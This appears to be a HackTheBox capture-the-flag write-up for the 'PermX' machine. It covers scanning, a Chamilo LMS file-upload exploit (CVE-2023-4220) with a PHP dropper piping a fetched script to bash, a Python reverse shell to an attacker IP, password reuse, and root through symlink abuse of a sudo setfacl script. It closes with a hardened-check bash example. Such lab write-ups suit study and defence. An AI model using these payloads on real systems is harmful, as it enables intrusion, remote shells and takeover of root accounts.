HTB - PermX [Easy]
TCP Scan
> TARGET=10.129.84.122 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAyYzjPGuVga97Y5vl5BajgMpjiGqUWp23U2DO9Kij5AhK3lyZFq/rroiDu7zYpMTCkFAk0fICBScfnuLHi6NOI=
| 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8A41tX6hHpQeDLNhKf2QuBM7kqwhIBXGZ4jiOsbYCI
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
- add hostname
echo '10.129.84.122 permx.htb' >> /etc/hosts
enum
> dirsearch -u http://permx.htb -x 403
[15:41:04] 301 - 303B - /js -> http://permx.htb/js/
[15:41:20] 200 - 3KB - /404.html
[15:41:23] 200 - 4KB - /about.html
[15:41:54] 200 - 3KB - /contact.html
[15:41:55] 301 - 304B - /css -> http://permx.htb/css/
[15:42:08] 301 - 304B - /img -> http://permx.htb/img/
[15:42:12] 200 - 448B - /js/
[15:42:13] 301 - 304B - /lib -> http://permx.htb/lib/
[15:42:13] 200 - 491B - /lib/
[15:42:13] 200 - 649B - /LICENSE.txt
wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://permx.htb/" -H "Host: FUZZ.permx.htb" --hl 107
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 586 L 2466 W 36182 Ch "www"
000000477: 200 352 L 940 W 19347 Ch "lms"
(--hl 107 hides the 107-line default vhost response; lms.permx.htb also needs an entry in /etc/hosts before the next steps)
> curl http://permx.htb/LICENSE.txt
=> FREE HTML TEMPLATE LICENSE BY HTML Codex (the main site is a static stock template; nothing to attack there)
lms.permx.htb runs Chamilo LMS:
Administrator : Davis Miller
Powered by Chamilo © 2024
foothold: CVE-2023-4220 (Chamilo LMS unauthenticated file upload in bigUpload.php)
# dropper: when the uploaded PHP file is requested, the web server fetches rev.sh from the attacker box and pipes it to bash
echo '<?php system("curl http://10.10.14.28/rev.sh|bash"); ?>' > test.php
curl -F 'bigUploadFile=@test.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
# uploads land in the web-accessible files/ directory; requesting the file executes it
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/test.php'
# rev.sh, served from 10.10.14.28:80, with a listener on 10.10.14.28:4444 started before the trigger request
# the call-back address must be the attacker box, not 127.0.0.1: a loopback address would make the target connect to itself
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
user
- /var/www/chamilo/app/config/configuration.php
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
$_configuration['db_manager_enabled'] = false;
- the database password is reused for the local account mtz, so it works for SSH
> ssh mtz@permx.htb
mtz@permx:~$ cat user.txt
81e7de00461735b125c060e44aba3264
mtz@permx:~$
root
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
/opt/acl.sh
#!/bin/bash
if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
- exploit: the check is a string test on the unresolved path, and neither `-f` nor setfacl refuse symlinks, so a symlink inside /home/mtz pointing at / lets the script grant an ACL on any file on the system
mtz@permx:~$ ln -s / root
mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
# /etc/shadow is now writable by mtz: replace root's hash with mtz's, then su root with mtz's own password
mtz@permx:~$ vi /etc/shadow
mtz@permx:~$ su root
Password:
root@permx:/home/mtz# cat /root/root.txt
e11798eccb1882d97016158f13ad02ad
or, after granting mtz write access to /etc/passwd through the same symlink:
# Generate an md5crypt password hash for pass123
> openssl passwd -1 -salt hacker pass123
# Add a uid 0 user to /etc/passwd, then su hacker with pass123
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd
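To show why the symlink gets past /opt/acl.sh and what a correct check looks like, the following is an added example (not the box's script): the page's prefix test reproduced as vuln_check beside a hardened safe_check that canonicalises the path with readlink -f before comparing, plus a dry-run wrapper that also validates the user and permission arguments. The base directory is a parameter so the bypass can be reproduced in a scratch directory instead of /home/mtz; GNU readlink on Linux is assumed.

```shell
#!/usr/bin/env bash
# Added example, not /opt/acl.sh from the box. Assumes GNU coreutils (readlink -f).

# The check as written in /opt/acl.sh, with /home/mtz replaced by $1: a glob test
# on the unresolved string, so $base/root -> / passes as long as the final
# component is a regular file.
vuln_check() {
    local base="$1" target="$2"
    if [[ "$target" != "$base"/* || "$target" == *..* ]]; then
        return 1
    fi
    [ -f "$target" ]
}

# Hardened: resolve every symlink on both sides first, apply the prefix test to
# the resolved path, and refuse an argument that is itself a symlink.
safe_check() {
    local base="$1" target="$2" real
    base=$(readlink -f -- "$base") || return 1
    real=$(readlink -f -- "$target") || return 1
    [[ "$real" == "$base"/* ]] || return 1
    [ ! -L "$target" ] || return 1
    [ -f "$real" ]
}

# Hardened wrapper: validates user and perm as well (perm is passed to setfacl -m,
# which accepts comma-separated entry lists), and prints the setfacl command it
# would run on the resolved path instead of executing it, so it needs no sudo.
hardened_acl() {
    local base="$1" user="$2" perm="$3" target="$4" real
    [[ "$user" =~ ^[A-Za-z_][A-Za-z0-9._-]*$ ]] || { echo "bad user" >&2; return 1; }
    id -u "$user" >/dev/null 2>&1 || { echo "unknown user" >&2; return 1; }
    [[ "$perm" =~ ^[rwx-]{1,3}$ ]] || { echo "bad perm" >&2; return 1; }
    safe_check "$base" "$target" || { echo "Access denied." >&2; return 1; }
    real=$(readlink -f -- "$target")
    printf 'setfacl -m u:%s:%s -- %s\n' "$user" "$perm" "$real"
}

# Reproduce the bypass in a scratch tree: $t/etc/shadow is a constructed
# stand-in (placeholder text, not a real hash).
demo() {
    local t base
    t=$(mktemp -d)
    base="$t/home/mtz"
    mkdir -p "$base" "$t/etc"
    echo 'placeholder' > "$t/etc/shadow"
    ln -s "$t" "$base/root"                      # same trick as: ln -s / root
    if vuln_check "$base" "$base/root/etc/shadow"; then
        echo "original check : allowed $base/root/etc/shadow"
    fi
    if ! safe_check "$base" "$base/root/etc/shadow"; then
        echo "hardened check : denied, resolves to $(readlink -f -- "$base/root/etc/shadow")"
    fi
    rm -rf "$t"
}

demo
```

Even safe_check is a check-then-act on a path the caller controls, so a symlink swapped in between the test and setfacl still wins the race; the durable fix is not to expose a sudo-backed setfacl on caller-supplied paths at all.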
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack